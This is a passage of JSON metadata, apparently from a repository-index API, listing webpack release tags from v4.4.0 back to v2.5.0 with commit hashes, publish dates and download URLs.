.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"bf4ec9c26e8f6de76c3d3ec1371f3ca1c8999ca5","kind":"tag","published_at":"2017-06-19T15:37:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.2","sha":"2ba04991056475509a4e45599a1f42e91cce6233","kind":"tag","published_at":"2017-06-14T21:46:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"2e8b77ddcf66867b208dffce97fb94a87be48369","kind":"tag","published_at":"2017-06-07T11:33:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.1/manifests"},{"name":"v3.0.0-rc.0","sha":"3d653290fafe385277b48e5a36807124618b9561","kind":"tag","published_at":"2017-06-05T14:12:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id"